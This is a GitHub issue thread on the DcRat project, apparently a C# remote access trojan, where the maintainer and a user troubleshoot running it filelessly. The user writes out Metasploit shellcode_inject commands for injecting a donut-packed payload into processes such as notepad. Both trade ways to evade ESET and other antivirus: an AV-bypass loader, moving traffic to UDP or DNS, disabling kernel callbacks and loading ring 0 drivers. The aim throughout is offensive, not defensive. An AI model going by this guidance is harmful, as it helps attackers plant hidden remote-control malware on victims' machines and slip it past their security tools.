qwqdanchun / DcRat

A simple remote tool in C#.
MIT License
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I asked a donut a month ago #8

Closed qwer0123456 closed 3 years ago

qwer0123456 commented 3 years ago

Will the problem be solved?

localhost vmware connection is fine

If you connect with an external IP, you cannot connect. (

Analyzing the source a little more,

Need more HWID and specific user ID?

remotedesktop.dll does not connect to the new port,

but In the case of file search, a new port connection is possible

The fileless technique is good

If this is resolved, there is also a willingness to donate

I don't know how to fix

If the issue is unrelated to the topic or cannot be fixed, please close the issue

Thank you

qwqdanchun commented 3 years ago

I've tried donut,the problem maybe caused by the unsafe code. image https://github.com/qwqdanchun/DcRat/blob/main/Plugin/RemoteDesktop/RemoteDesktop/StreamLibrary/UnsafeCodecs/UnsafeStreamCodec.cs

you will find some native code in remotedesktop.dll

qwqdanchun commented 3 years ago

maybe look at this project https://github.com/qwqdanchun/Bypass it shows how to code a loader to bypass av change the way of encryption, and enjoy it.

qwer0123456 commented 3 years ago

Unsafe code -> It is impossible to convert to safe code?

Can't fix it in UnsafeStreamCodec.cs?

The fileless technique I tested is

Compile it to a donut and run the command below

metasploit command

use post/windows/manage/shellcode_inject

set AUTOUNHOOK false



set pid 0

set shellcode /root/payload.bin

set session 1(number)


qwer0123456 commented 3 years ago


In the case of a quasar remote, view the screen possible

There seems to be something different

qwqdanchun commented 3 years ago

Sorry for what i say before. I make a payload.bin with donut ,and test with a c# loader and a c++ loader just now. both work well.So it may not because of the unsafe code.

Don't have msf on my pc, can't test the shellcode_inject module. Have you ever tried any shellcode loader?

qwer0123456 commented 3 years ago

You don't have to use Metasploit

You can also create thread after copying the donut compressed program to memory

Something that can be said for sure

quasar remote is view possible

I have no idea how to solve this problem

Thanks for the help

qwer0123456 commented 3 years ago

pid 0 runs notepad.exe -> new notepad process memory injection

You can also specify the pid

qwqdanchun commented 3 years ago

try to change the pid.

I find that this artical says"在注入进程时,发现注入到notepad.exe中无法执行,但注入到powershell中可以执行。" translated:"When the process is injected, it is found that injection into Notepad cannot be executed, but injection into PowerShell can be executed."


qwer0123456 commented 3 years ago

Process does not matter if the window session is the same process

explorer.exe,RuntimeBroker.exe,notepad.exe etc.. -> all impossible

Remote viewing of Quasar is possible

In UnsafeStreamCodec.cs, Quasar has several different parts.

I don't know why this is not possible from anync remote

qwqdanchun commented 3 years ago

try powershell,maybe because of the clr ?

qwqdanchun commented 3 years ago

can't find why it doesn't work

qwer0123456 commented 3 years ago


Quasar source works fine

This is the source with try and some additions

The screen is now displayed normally



eset antivirus msil/agent detect

eset detects unconditionally when connecting tcp socket

Do you know how to bypass eset tcp?

Screen output problem was solved lol


foreach (IPAddress theaddress in addresslist) { try { TcpClient.Connect(theaddress, ServerPort); // tcp connect eset anti virus detect if (TcpClient.Connected) break; } catch { } }

qwqdanchun commented 3 years ago

Thank you for your code. I'll push it later.

If you'd like to bypass tcp detect, may change it to udp or dns and so on

After install eset in VM. I test the rat. It didn't detect tcp when connect. Don't know why. However,sad to find many plugin may be detect. Maybe i should rewrite some plugin later.

qwer0123456 commented 3 years ago

not detected as exe execution

Memory area detection

  1. Copy the donut-packed memory and create thread

  2. Connect tcp in the created thread

  3. detect memory tcp connect

Normal exe execution is not detected

Fileless technique bypasses 90% of antivirus

I am curious if there is any new detection technique

thank you


Thanks for any hints on the screen viewing problem(unsafe code memory)

I don't know how to bypass eset

qwqdanchun commented 3 years ago

eset's scan is powerful. maybe it disable tcp connect from process like notepad?

this is my guess

qwqdanchun commented 3 years ago

For it didn't detect tcp connect when you just run it as exe

qwer0123456 commented 3 years ago



Obregistercallbacks in kernel

If you disable the loadimage kernel part to work with openark

Can't be detected

It seems to be detected if the running thread image address is not normal

Create thread and detect if the image address value is abnormal!

qwqdanchun commented 3 years ago

Good work!

However this is hard to bypass

qwqdanchun commented 3 years ago

usually you can't disable it in ring3

qwer0123456 commented 3 years ago

eset is like a good antivirus

If you load the drive with ring 0 it will probably be bypassed easily

From the general computer to the system privilege, you must also increase privileges and manipulate tokens

ring3 seems to need an idea

Thanks for the reply